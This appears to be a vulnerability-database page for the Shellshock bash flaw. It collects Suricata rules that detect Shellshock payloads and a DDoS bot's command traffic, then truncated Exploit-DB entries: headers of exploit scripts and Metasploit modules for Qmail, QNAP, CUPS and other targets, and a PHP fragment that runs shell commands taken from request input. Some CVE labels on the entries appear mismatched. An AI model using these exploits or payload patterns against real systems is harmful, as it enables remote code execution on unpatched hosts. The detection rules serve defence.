suricata·2014-12-10
CVE-2014-6271 ET EXPLOIT QNAP Shellshock script retrieval
ET EXPLOIT QNAP Shellshock script retrieval
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT QNAP Shellshock script retrieval"; flow:established,to_client; file.data; content:"|2f|share|2f|MD0_DATA|2f|optware|2f|.xpl|2f|"; fast_pattern; content:"unset HISTFIE"; reference:url,www.fireeye.com/blog/threat-research/2014/10/the-shellshock-aftershock-for-nas-administrators.html; reference:url,blogs.akamai.com/2014/09/environment-bashing.html; reference:cve,2014-6271; classtype:attempted-admin; sid:2019905; rev:5; metadata:created_at 2014_12_10, cve CVE_2014_6271, signature_severity Major, updated_at 2024_03_14;)
Suricata
ET EXPLOIT QNAP Shellshock CVE-2014-6271
suricata·2014-12-10·CVSS 9.8
CVE-2014-6271 [CRITICAL] ET EXPLOIT QNAP Shellshock CVE-2014-6271
ET EXPLOIT QNAP Shellshock CVE-2014-6271
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT QNAP Shellshock CVE-2014-6271"; flow:established,to_server; http.uri; content:"authLogin.cgi"; http.header; content:"|28 29 20 7b|"; fast_pattern; reference:url,www.fireeye.com/blog/threat-research/2014/10/the-shellshock-aftershock-for-nas-administrators.html; reference:url,blogs.akamai.com/2014/09/environment-bashing.html; reference:cve,2014-6271; classtype:attempted-admin; sid:2019904; rev:5; metadata:created_at 2014_12_10, cve CVE_2014_6271, signature_severity Major, tag CISA_KEV, updated_at 2020_10_13;)
Suricata
ET EXPLOIT Possible CVE-2014-6271 exploit attempt via malicious DNS
suricata·2014-10-15·CVSS 9.8
CVE-2014-6271 [CRITICAL] ET EXPLOIT Possible CVE-2014-6271 exploit attempt via malicious DNS
ET EXPLOIT Possible CVE-2014-6271 exploit attempt via malicious DNS
Rule: alert tcp $EXTERNAL_NET 53 -> $HOME_NET any (msg:"ET EXPLOIT Possible CVE-2014-6271 exploit attempt via malicious DNS"; byte_test:1,&,128,4; content:"|28 29 20 7b|"; fast_pattern; reference:cve,2014-6271; reference:url,packetstormsecurity.com/files/128650; classtype:attempted-admin; sid:2019403; rev:2; metadata:created_at 2014_10_15, cve CVE_2014_6271, confidence Medium, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2019_10_08;)
Suricata
ET EXPLOIT Possible CVE-2014-6271 malicious DNS response
suricata·2014-10-15·CVSS 9.8
CVE-2014-6271 [CRITICAL] ET EXPLOIT Possible CVE-2014-6271 malicious DNS response
ET EXPLOIT Possible CVE-2014-6271 malicious DNS response
Rule: alert udp $EXTERNAL_NET 53 -> $HOME_NET any (msg:"ET EXPLOIT Possible CVE-2014-6271 malicious DNS response"; byte_test:1,&,128,2; content:"|28 29 20 7b|"; fast_pattern; reference:cve,2014-6271; reference:url,packetstormsecurity.com/files/128650; classtype:attempted-admin; sid:2019402; rev:2; metadata:created_at 2014_10_15, cve CVE_2014_6271, confidence Medium, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2019_10_08;)
Suricata
ET EXPLOIT Possible Postfix CVE-2014-6271 attempt
suricata·2014-10-10·CVSS 9.8
CVE-2014-6271 [CRITICAL] ET EXPLOIT Possible Postfix CVE-2014-6271 attempt
ET EXPLOIT Possible Postfix CVE-2014-6271 attempt
Rule: alert tcp any any -> $HOME_NET [25,587] (msg:"ET EXPLOIT Possible Postfix CVE-2014-6271 attempt"; flow:established,to_server; content:"|28 29 20 7b|"; fast_pattern; pcre:"/^[a-z-]+\s*?\x3a\s*?[^\r\n]*?\x28\x29\x20\x7b.*\x3b.*\x7d\s*\x3b(?!=[\r\n])/mi"; reference:url,exploit-db.com/exploits/34896/; reference:cve,2014-6271; classtype:attempted-admin; sid:2019389; rev:6; metadata:created_at 2014_10_10, cve CVE_2014_6271, confidence Medium, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_06;)
Suricata
ET EXPLOIT Possible Pure-FTPd CVE-2014-6271 attempt
suricata·2014-10-02·CVSS 9.8
CVE-2014-6271 [CRITICAL] ET EXPLOIT Possible Pure-FTPd CVE-2014-6271 attempt
ET EXPLOIT Possible Pure-FTPd CVE-2014-6271 attempt
Rule: alert tcp any any -> $HOME_NET 21 (msg:"ET EXPLOIT Possible Pure-FTPd CVE-2014-6271 attempt"; flow:established,to_server; content:"|28 29 20 7b 20|"; fast_pattern; reference:url,gist.github.com/jedisct1/88c62ee34e6fa92c31dc; reference:cve,2014-6271; classtype:attempted-admin; sid:2019335; rev:3; metadata:created_at 2014_10_02, cve CVE_2014_6271, confidence Medium, signature_severity Major, tag CISA_KEV, updated_at 2024_03_06;)
Suricata
ET EXPLOIT Possible OpenVPN CVE-2014-6271 attempt
suricata·2014-09-30·CVSS 9.8
CVE-2014-6271 [CRITICAL] ET EXPLOIT Possible OpenVPN CVE-2014-6271 attempt
ET EXPLOIT Possible OpenVPN CVE-2014-6271 attempt
Rule: alert udp any any -> $HOME_NET 1194 (msg:"ET EXPLOIT Possible OpenVPN CVE-2014-6271 attempt"; flow:to_server; content:"|20|"; depth:1; content:"|28 29 20 7b|"; fast_pattern; reference:url,news.ycombinator.com/item?id=8385332; classtype:attempted-admin; sid:2019322; rev:3; metadata:created_at 2014_09_30, cve CVE_2014_6271, confidence Medium, signature_severity Major, tag CISA_KEV, updated_at 2019_10_08;)
Suricata
ET EXPLOIT Possible OpenVPN CVE-2014-6271 attempt
suricata·2014-09-30·CVSS 9.8
CVE-2014-6271 [CRITICAL] ET EXPLOIT Possible OpenVPN CVE-2014-6271 attempt
ET EXPLOIT Possible OpenVPN CVE-2014-6271 attempt
Rule: alert tcp any any -> $HOME_NET 1194 (msg:"ET EXPLOIT Possible OpenVPN CVE-2014-6271 attempt"; flow:established,to_server; content:"|20|"; depth:1; content:"|28 29 20 7b|"; fast_pattern; reference:url,news.ycombinator.com/item?id=8385332; classtype:attempted-admin; sid:2019323; rev:4; metadata:created_at 2014_09_30, cve CVE_2014_6271, confidence Medium, signature_severity Major, tag CISA_KEV, updated_at 2024_03_06;)
Suricata
ET MALWARE Linux/ShellshockCampaign.DDOSBot Reporting IP
suricata·2014-09-29
CVE-2014-6271 ET MALWARE Linux/ShellshockCampaign.DDOSBot Reporting IP
ET MALWARE Linux/ShellshockCampaign.DDOSBot Reporting IP
Rule: alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"ET MALWARE Linux/ShellshockCampaign.DDOSBot Reporting IP"; flow:established,to_server; dsize:<24; content:"My IP|3A| "; depth:7; pcre:"/My\x20IP\x3A\x20\d{1,3}\x2E\d{1,3}\x2E\d{1,3}\x2E\d{1,3}\x0A/"; reference:url,research.zscaler.com/2014/09/shellshock-attacks-spotted-in-wild.html; reference:cve,2014-6271; classtype:trojan-activity; sid:2019294; rev:1; metadata:created_at 2014_09_29, cve CVE_2014_6271, signature_severity Major, updated_at 2019_07_26;)
Suricata
ET EXPLOIT Possible Qmail CVE-2014-6271 Mail From attempt
suricata·2014-09-29·CVSS 9.8
CVE-2014-6271 [CRITICAL] ET EXPLOIT Possible Qmail CVE-2014-6271 Mail From attempt
ET EXPLOIT Possible Qmail CVE-2014-6271 Mail From attempt
Rule: alert tcp any any -> $HOME_NET [25,587] (msg:"ET EXPLOIT Possible Qmail CVE-2014-6271 Mail From attempt"; flow:established,to_server; content:"|28 29 20 7b|"; fast_pattern; pcre:"/^mail\s*?from\s*?\x3a\s*?[^\r\n]*?\x28\x29\x20\x7b/mi"; reference:url,marc.info/?l=qmail&m=141183309314366&w=2; classtype:attempted-admin; sid:2019293; rev:4; metadata:created_at 2014_09_29, cve CVE_2014_6271, confidence Medium, signature_severity Major, tag CISA_KEV, updated_at 2024_03_06;)
Suricata
ET MALWARE Linux/ShellshockCampaign.DDOSBot Terminate Process CnC Server Message
suricata·2014-09-29
CVE-2014-6271 ET MALWARE Linux/ShellshockCampaign.DDOSBot Terminate Process CnC Server Message
ET MALWARE Linux/ShellshockCampaign.DDOSBot Terminate Process CnC Server Message
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"ET MALWARE Linux/ShellshockCampaign.DDOSBot Terminate Process CnC Server Message"; flow:established,to_client; dsize:12; content:"! LOLNOGTFO|0A|"; depth:12; reference:url,research.zscaler.com/2014/09/shellshock-attacks-spotted-in-wild.html; reference:cve,2014-6271; classtype:command-and-control; sid:2019304; rev:2; metadata:created_at 2014_09_29, cve CVE_2014_6271, signature_severity Major, updated_at 2019_07_26;)
Suricata
ET MALWARE Linux/ShellshockCampaign.DDOSBot Execute Shell Command CnC Server Message
suricata·2014-09-29
CVE-2014-6271 ET MALWARE Linux/ShellshockCampaign.DDOSBot Execute Shell Command CnC Server Message
ET MALWARE Linux/ShellshockCampaign.DDOSBot Execute Shell Command CnC Server Message
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"ET MALWARE Linux/ShellshockCampaign.DDOSBot Execute Shell Command CnC Server Message"; flow:established,to_client; content:"! SH"; depth:4; pcre:"/^[^\r\n]+?\n$/R"; reference:url,research.zscaler.com/2014/09/shellshock-attacks-spotted-in-wild.html; reference:cve,2014-6271; classtype:command-and-control; sid:2019298; rev:2; metadata:created_at 2014_09_29, cve CVE_2014_6271, signature_severity Major, updated_at 2019_07_26;)
Suricata
ET MALWARE Linux/ShellshockCampaign.DDOSBot UDP Flood CnC Server Message
suricata·2014-09-29
CVE-2014-6271 ET MALWARE Linux/ShellshockCampaign.DDOSBot UDP Flood CnC Server Message
ET MALWARE Linux/ShellshockCampaign.DDOSBot UDP Flood CnC Server Message
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"ET MALWARE Linux/ShellshockCampaign.DDOSBot UDP Flood CnC Server Message"; flow:established,to_client; content:"! UDP "; depth:6; pcre:"/\x21\x20UDP\x20\d{1,3}\x2E\d{1,3}\x2E\d{1,3}\x2E\d{1,3}/"; reference:url,research.zscaler.com/2014/09/shellshock-attacks-spotted-in-wild.html; reference:cve,2014-6271; classtype:command-and-control; sid:2019300; rev:2; metadata:created_at 2014_09_29, cve CVE_2014_6271, signature_severity Major, updated_at 2019_07_26;)
Suricata
ET WEB_SERVER CVE-2014-6271 Attempt In HTTP Headers Line Continuation Evasion CRLF
suricata·2014-09-28·CVSS 9.8
CVE-2014-6271 [CRITICAL] ET WEB_SERVER CVE-2014-6271 Attempt In HTTP Headers Line Continuation Evasion CRLF
ET WEB_SERVER CVE-2014-6271 Attempt In HTTP Headers Line Continuation Evasion CRLF
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER CVE-2014-6271 Attempt In HTTP Headers Line Continuation Evasion CRLF"; flow:established,to_server; http.header; content:"|28 29 0d 0a 20 7b|"; fast_pattern; reference:url,www.invisiblethreat.ca/2014/09/cve-2014-6271/; classtype:attempted-admin; sid:2019292; rev:6; metadata:created_at 2014_09_28, cve CVE_2014_6271, confidence Medium, signature_severity Major, tag CISA_KEV, updated_at 2024_04_07;)
Suricata
ET WEB_SERVER CVE-2014-6271 Attempt In HTTP Headers Line Continuation Evasion LF
suricata·2014-09-28·CVSS 9.8
CVE-2014-6271 [CRITICAL] ET WEB_SERVER CVE-2014-6271 Attempt In HTTP Headers Line Continuation Evasion LF
ET WEB_SERVER CVE-2014-6271 Attempt In HTTP Headers Line Continuation Evasion LF
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER CVE-2014-6271 Attempt In HTTP Headers Line Continuation Evasion LF"; flow:established,to_server; http.header; content:"|28 29 0a 20 7b|"; fast_pattern; reference:url,www.invisiblethreat.ca/2014/09/cve-2014-6271/; classtype:attempted-admin; sid:2019291; rev:5; metadata:created_at 2014_09_28, cve CVE_2014_6271, signature_severity Major, tag CISA_KEV, updated_at 2024_04_07;)
Suricata
ET EXPLOIT Possible CVE-2014-6271 Attempt Against SIP Proxy
suricata·2014-09-27·CVSS 9.8
CVE-2014-6271 [CRITICAL] ET EXPLOIT Possible CVE-2014-6271 Attempt Against SIP Proxy
ET EXPLOIT Possible CVE-2014-6271 Attempt Against SIP Proxy
Rule: alert udp any any -> $HOME_NET [5060,5061] (msg:"ET EXPLOIT Possible CVE-2014-6271 Attempt Against SIP Proxy"; flow:to_server; content:"|28 29 20 7b|"; fast_pattern; reference:url,github.com/zaf/sipshock; reference:cve,2014-6271; classtype:attempted-admin; sid:2019289; rev:4; metadata:created_at 2014_09_27, cve CVE_2014_6271, confidence Medium, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2023_05_24;)
Suricata
ET EXPLOIT Possible CVE-2014-6271 Attempt Against SIP Proxy
suricata·2014-09-27·CVSS 9.8
CVE-2014-6271 [CRITICAL] ET EXPLOIT Possible CVE-2014-6271 Attempt Against SIP Proxy
ET EXPLOIT Possible CVE-2014-6271 Attempt Against SIP Proxy
Rule: alert tcp any any -> $HOME_NET [5060,5061] (msg:"ET EXPLOIT Possible CVE-2014-6271 Attempt Against SIP Proxy"; flow:established,to_server; content:"|28 29 20 7b|"; fast_pattern; reference:url,github.com/zaf/sipshock; classtype:attempted-admin; sid:2019290; rev:4; metadata:created_at 2014_09_27, cve CVE_2014_6271, confidence Medium, signature_severity Major, tag CISA_KEV, updated_at 2024_03_06;)
Suricata
ET WEB_SERVER Possible CVE-2014-6271 Attempt in Client Body
suricata·2014-09-25·CVSS 9.8
CVE-2014-6271 [CRITICAL] ET WEB_SERVER Possible CVE-2014-6271 Attempt in Client Body
ET WEB_SERVER Possible CVE-2014-6271 Attempt in Client Body
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Client Body"; flow:established,to_server; http.request_body; content:"|28 29 20 7b|"; fast_pattern; pcre:"/(?:^|[=?&])\s*?\x28\x29\x20\x7b/"; reference:url,blogs.akamai.com/2014/09/environment-bashing.html; classtype:attempted-admin; sid:2019233; rev:7; metadata:created_at 2014_09_25, cve CVE_2014_6271, confidence Medium, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_11_19, reviewed_at 2024_03_06;)
Suricata
ET WEB_SERVER Possible CVE-2014-6271 Attempt in Client Body 2
suricata·2014-09-25·CVSS 9.8
CVE-2014-6271 [CRITICAL] ET WEB_SERVER Possible CVE-2014-6271 Attempt in Client Body 2
ET WEB_SERVER Possible CVE-2014-6271 Attempt in Client Body 2
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Client Body 2"; flow:established,to_server; http.request_body; content:"|25|28|25|29|25|20|25|7b|25|20"; fast_pattern; pcre:"/(:?(:?\x5e|%5e)|(:?[=?&]|\x25(:?3d|3f|26)))\s*?(:?%28|\x28)(:?%29|\x29)(:?%20|\x20)(:?%7b|\x7b)(:?%20|\x20)/i"; reference:url,blogs.akamai.com/2014/09/environment-bashing.html; classtype:attempted-admin; sid:2019234; rev:6; metadata:created_at 2014_09_25, cve CVE_2014_6271, confidence Medium, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_09_25;)
Suricata
ET WEB_SERVER Possible CVE-2014-6271 Attempt in Client Body 3
suricata·2014-09-25·CVSS 9.8
CVE-2014-6271 [CRITICAL] ET WEB_SERVER Possible CVE-2014-6271 Attempt in Client Body 3
ET WEB_SERVER Possible CVE-2014-6271 Attempt in Client Body 3
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Client Body 3"; flow:established,to_server; http.request_body; content:"()|25|20|25|7b"; fast_pattern; pcre:"/(:?(?:\x5e|%5e)|([=?&]|\x25(?:3d|3f|26)))\s*?\(\)(?:%20|\x20)(?:%7b|\x7b)/i"; reference:url,blogs.akamai.com/2014/09/environment-bashing.html; classtype:attempted-admin; sid:2019241; rev:5; metadata:created_at 2014_09_25, cve CVE_2014_6271, confidence Medium, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_09_25;)
Suricata
ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie
suricata·2014-09-25·CVSS 9.8
CVE-2014-6271 [CRITICAL] ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie
ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie"; flow:established,to_server; http.cookie; content:"|28 29 20 7b|"; reference:url,blogs.akamai.com/2014/09/environment-bashing.html; classtype:attempted-admin; sid:2019239; rev:5; metadata:created_at 2014_09_25, cve CVE_2014_6271, confidence Medium, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_05_12;)
Suricata
ET EXPLOIT Possible CVE-2014-6271 exploit attempt via malicious DHCP ACK
suricata·2014-09-25·CVSS 9.8
CVE-2014-6271 [CRITICAL] ET EXPLOIT Possible CVE-2014-6271 exploit attempt via malicious DHCP ACK
ET EXPLOIT Possible CVE-2014-6271 exploit attempt via malicious DHCP ACK
Rule: alert udp any 67 -> any 68 (msg:"ET EXPLOIT Possible CVE-2014-6271 exploit attempt via malicious DHCP ACK"; content:"|02 01|"; depth:2; content:"|28 29 20 7b|"; fast_pattern; reference:url,access.redhat.com/articles/1200223; reference:cve,2014-6271; classtype:attempted-admin; sid:2019237; rev:5; metadata:created_at 2014_09_25, cve CVE_2014_6271, confidence Medium, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2019_10_08;)
Suricata
ET WEB_SERVER Possible CVE-2014-6271 Attempt in URI
suricata·2014-09-25·CVSS 9.8
CVE-2014-6271 [CRITICAL] ET WEB_SERVER Possible CVE-2014-6271 Attempt in URI
ET WEB_SERVER Possible CVE-2014-6271 Attempt in URI
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER Possible CVE-2014-6271 Attempt in URI"; flow:established,to_server; http.uri; content:"|28 29 20 7b|"; fast_pattern; pcre:"/[=?&\x2f]\s*?\x28\x29\x20\x7b/"; reference:url,blogs.akamai.com/2014/09/environment-bashing.html; classtype:attempted-admin; sid:2019231; rev:6; metadata:created_at 2014_09_25, cve CVE_2014_6271, confidence Medium, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_09_25;)
Suricata
ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers
suricata·2014-09-25·CVSS 9.8
CVE-2014-6271 [CRITICAL] ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers
ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers"; flow:established,to_server; http.header; content:"|28 29 20 7b|"; fast_pattern; content:"bash|20 2d|c"; reference:url,blogs.akamai.com/2014/09/environment-bashing.html; classtype:attempted-admin; sid:2019232; rev:7; metadata:created_at 2014_09_25, cve CVE_2014_6271, confidence Medium, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_11_03, reviewed_at 2024_03_06;)
Exploit-DB
Qmail SMTP 1.03 - Bash Environment Variable Injection
exploitdb·2020-07-08·CVSS 9.8
CVE-2014-6271 [CRITICAL] Qmail SMTP 1.03 - Bash Environment Variable Injection
Qmail SMTP 1.03 - Bash Environment Variable Injection
---
# Exploit Title: Qmail SMTP 1.03 - Bash Environment Variable Injection
# Date: 2020-07-03
# Exploit Author: 1F98D
# Original Authors: Mario Ledo, Mario Ledo, Gabriel Follon
# Version: Qmail 1.03
# Tested on: Debian 9.11 (x64)
# CVE: CVE-2014-6271
# References:
# http://seclists.org/oss-sec/2014/q3/649
# https://lists.gt.net/qmail/users/138578
#
# Qmail is vulnerable to a Shellshock vulnerability due to lack of validation
# in the MAIL FROM field.
#
#!/usr/local/bin/python3
from socket import *
import sys
if len(sys.argv) != 4:
print('Usage {} '.format(sys.argv[0]))
print("E.g. {} 127.0.0.1 'root@debian' 'touch /tmp/x'".format(sys.argv[0]))
sys.exit(1)
TARGET = sys.argv[1]
MAILTO = sys.argv[2]
CMD = sys.argv[3]
s = socket(AF_IN
Exploit-DB
Qmail SMTP - Bash Environment Variable Injection (Metasploit)
exploitdb·2017-10-02
CVE-2014-6271 Qmail SMTP - Bash Environment Variable Injection (Metasploit)
Qmail SMTP - Bash Environment Variable Injection (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'Qmail SMTP Bash Environment Variable Injection (Shellshock)',
'Description' => %q{
This module exploits a shellshock vulnerability on Qmail, a public
domain MTA written in C that runs on Unix systems.
Due to the lack of validation on the MAIL FROM field, it is possible to
execute shell code on a system with a vulnerable BASH (Shellshock).
This flaw works on the latest Qmail versions (qmail-1.03 and
netqmail-1.06).
However, in order to execute code, /bin/sh has to be linked to bash
(usually default configuration) and a valid recipient must be set on the
RCPT TO fie
Exploit-DB
RedStar 3.0 Server - 'Shellshock' 'BEAM' / 'RSSMON' Command Injection
exploitdb·2016-12-18·CVSS 9.8
CVE-2014-6271 [CRITICAL] RedStar 3.0 Server - 'Shellshock' 'BEAM' / 'RSSMON' Command Injection
RedStar 3.0 Server - 'Shellshock' 'BEAM' / 'RSSMON' Command Injection
---
#!/usr/bin/env python
# RedStar OS 3.0 Server (BEAM & RSSMON) shellshock exploit
# ========================================================
# BEAM & RSSMON are Webmin based configuration utilities
# that ship with RSS server 3.0. These packages are the
# recommended GUI configuration components and listen on
# a user specified port from 10000/tcp to 65535/tcp. They
# are accessible on the local host only in vanilla install
# unless the firewall is disabled. Both services run with
# full root permissions and can be exploited for LPE or
# network attacks. RSSMON has hardened SELinux policies
# applied which hinder exploitation of this vulnerability
# be limiting access to network resources. Commands are
# still run a
Exploit-DB
TrendMicro InterScan Web Security Virtual Appliance - 'Shellshock' Remote Command Injection
exploitdb·2016-10-21·CVSS 9.8
CVE-2014-6271 [CRITICAL] TrendMicro InterScan Web Security Virtual Appliance - 'Shellshock' Remote Command Injection
TrendMicro InterScan Web Security Virtual Appliance - 'Shellshock' Remote Command Injection
---
#!/usr/bin/env python
# TrendMicro InterScan Web Security Virtul Appliance
# ==================================================
# InterScan Web Security is a software virtual appliance that
# dynamically protects against the ever-growing flood of web
# threats at the Internet gateway exclusively designed to secure
# you against traditional and emerging web threats at the Internet
# gateway. The appliance however is shipped with a vulnerable
# version of Bash susceptible to shellshock (I know right?). An
# attacker can exploit this vulnerability by calling the CGI
# shellscript "/cgi-bin/cgiCmdNotify" which can be exploited
# to perform arbitrary code execution. A limitation of this
# vulnerabi
Exploit-DB
IPFire - 'Shellshock' Bash Environment Variable Command Injection (Metasploit)
exploitdb·2016-06-10
CVE-2014-6271 IPFire - 'Shellshock' Bash Environment Variable Command Injection (Metasploit)
IPFire - 'Shellshock' Bash Environment Variable Command Injection (Metasploit)
---
##
## This module requires Metasploit: http://metasploit.com/download
## Current source: https://github.com/rapid7/metasploit-framework
###
require 'msf/core'
class MetasploitModule 'IPFire Bash Environment Variable Injection (Shellshock)',
'Description' => %q(
IPFire, a free linux based open source firewall distribution,
version
[
'h00die ', # module
'Claudio Viviani' # discovery
],
'References' =>
[
[ 'EDB', '34839' ],
[ 'CVE', '2014-6271']
],
'License' => MSF_LICENSE,
'Platform' => %w( linux unix ),
'Privileged' => false,
'DefaultOptions' =>
{
'SSL' => true,
'PAYLOAD' => 'cmd/unix/generic'
},
'Arch' => ARCH_CMD,
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic'
}
},
'Targ
Exploit-DB
Advantech Switch - 'Shellshock' Bash Environment Variable Command Injection (Metasploit)
exploitdb·2015-12-02·CVSS 9.8
CVE-2014-7196 [CRITICAL] Advantech Switch - 'Shellshock' Bash Environment Variable Command Injection (Metasploit)
Advantech Switch - 'Shellshock' Bash Environment Variable Command Injection (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 'Advantech Switch Bash Environment Variable Code Injection (Shellshock)',
'Description' => %q{
This module exploits the Shellshock vulnerability, a flaw in how the Bash shell
handles external environment variables. This module targets the 'ping.sh' CGI
script, acessible through the Boa web server on Advantech switches. This module
was tested against firmware version 1322_D1.98.
},
'Author' => 'hdm',
'References' => [
['CVE', '2014-6271'],
['CWE', '94'],
['OSVDB', '112004'],
['EDB', '34765'],
['URL', 'https://community.rapid
Exploit-DB
Cisco Unified Communications Manager - Multiple Vulnerabilities
exploitdb·2015-08-18·CVSS 9.8
CVE-2014-8008 [CRITICAL] Cisco Unified Communications Manager - Multiple Vulnerabilities
Cisco Unified Communications Manager - Multiple Vulnerabilities
---
Vantage Point Security Advisory 2015-001
Title: Cisco Unified Communications Manager Multiple Vulnerabilities
Vendor: Cisco
Vendor URL: http://www.cisco.com/
Versions affected:
Summary:
Cisco Unified Communications Manager (CUCM) offers services such as session
management, voice, video, messaging, mobility, and web conferencing.
During the last year, Vantage Point Security has reported four security
issues to Cisco as listed below.
1. Shellshock command injection
Authenticated users of CUCM can access limited functionality via the web
interface and Cisco console (SSH on port 22). Because the SSH server is
configured to process several environment variables from the client and a
vulnerable version of bash is used,
Exploit-DB
Kemp Load Master 7.1.16 - Multiple Vulnerabilities
exploitdb·2015-04-02·CVSS 8.8
CVE-2014-7910 [HIGH] Kemp Load Master 7.1.16 - Multiple Vulnerabilities
Kemp Load Master 7.1.16 - Multiple Vulnerabilities
---
# Exploit Title: Kemp Load Master - Multiple Vulnerabilities (RCE, CSRF, XSS, DoS)
# Date: 01 April 2015
# Author: Roberto Suggi Liverani
# Software Link: http://kemptechnologies.com/load-balancer/
# Version: 7.1.16 and previous versions
# Tested on: Kemp Load Master 7.1-16
# CVE : CVE-2014-5287/5288
Link: http://blog.malerisch.net/2015/04/playing-with-kemp-load-master.html
Kemp virtual load master is a virtual load-balancer appliance which comes with a web administrative interface. I had a chance to test it and this blog post summarises some of the most interesting vulnerabilities I have discovered and which have not been published yet. For those of you who want to try it as well, you can get a free trial version here: http://kemp
Exploit-DB
QNAP - Admin Shell via Bash Environment Variable Code Injection (Metasploit)
exploitdb·2015-03-26
CVE-2014-7910 QNAP - Admin Shell via Bash Environment Variable Code Injection (Metasploit)
QNAP - Admin Shell via Bash Environment Variable Code Injection (Metasploit)
---
# Exploit Title: QNAP admin shell via Bash Environment Variable Code Injection
# Date: 7 February 2015
# Exploit Author: Patrick Pellegrino | [email protected] [work] / [email protected] [other]
# Employer homepage: http://www.securegroup.it
# Vendor homepage: http://www.qnap.com
# Version: All Turbo NAS models except TS-100, TS-101, TS-200
# Tested on: TS-1279U-RP
# CVE : 2014-6271
# Vendor URL bulletin : http://www.qnap.com/i/it/support/con_show.php?cid=61
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/d3vpp/metasploit-modules
##
require 'msf/core'
require 'net/telnet'
class Metasploit3
Exploit-DB
QNAP - Web Server Remote Code Execution via Bash Environment Variable Code Injection (Metasploit)
exploitdb·2015-03-26
CVE-2014-7910 QNAP - Web Server Remote Code Execution via Bash Environment Variable Code Injection (Metasploit)
QNAP - Web Server Remote Code Execution via Bash Environment Variable Code Injection (Metasploit)
---
# Exploit Title: QNAP Web server remote code execution via Bash Environment Variable Code Injection
# Date: 7 February 2015
# Exploit Author: Patrick Pellegrino | [email protected] [work] / [email protected] [other]
# Employer homepage: http://www.securegroup.it
# Vendor homepage: http://www.qnap.com
# Version: All Turbo NAS models except TS-100, TS-101, TS-200
# Tested on: TS-1279U-RP
# CVE : 2014-6271
# Vendor URL bulletin : http://www.qnap.com/i/it/support/con_show.php?cid=61
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/d3vpp/metasploit-modules
##
require 'msf/core
Exploit-DB
PHP < 5.6.2 - 'Shellshock' Safe Mode / disable_functions Bypass / Command Injection
exploitdb·2014-11-03·CVSS 9.8
CVE-2014-7910 [CRITICAL] PHP < 5.6.2 - 'Shellshock' Safe Mode / disable_functions Bypass / Command Injection
PHP
$tmp 2>&1");
// In Safe Mode, the user may only alter environment variables whose names
// begin with the prefixes supplied by this directive.
// By default, users will only be able to set environment variables that
// begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive is empty,
// PHP will let the user modify ANY environment variable!
mail("[email protected]","","","","-bv"); // -bv so we don't actually send any mail
}
else return "Not vuln (not bash)";
$output = @file_get_contents($tmp);
@unlink($tmp);
if($output != "") return $output;
else return "No output, or not vuln.";
}
echo shellshock($_REQUEST["cmd"]);
?>
Exploit-DB
CUPS Filter - Bash Environment Variable Code Injection (Metasploit)
exploitdb·2014-10-29·CVSS 8.8
CVE-2014-7910 [HIGH] CUPS Filter - Bash Environment Variable Code Injection (Metasploit)
CUPS Filter - Bash Environment Variable Code Injection (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 'CUPS Filter Bash Environment Variable Code Injection',
'Description' => %q{
This module exploits a post-auth code injection in specially crafted
environment variables in Bash, specifically targeting CUPS filters
through the PRINTER_INFO and PRINTER_LOCATION variables by default.
},
'Author' => [
'Stephane Chazelas', # Vulnerability discovery
'lcamtuf', # CVE-2014-6278
'Brendan Coles ' # msf
],
'References' => [
['CVE', '2014-6271'],
['CVE', '2014-6278'],
['EDB', '34765'],
['URL', 'https://access.redhat.com/articles/1200223'],
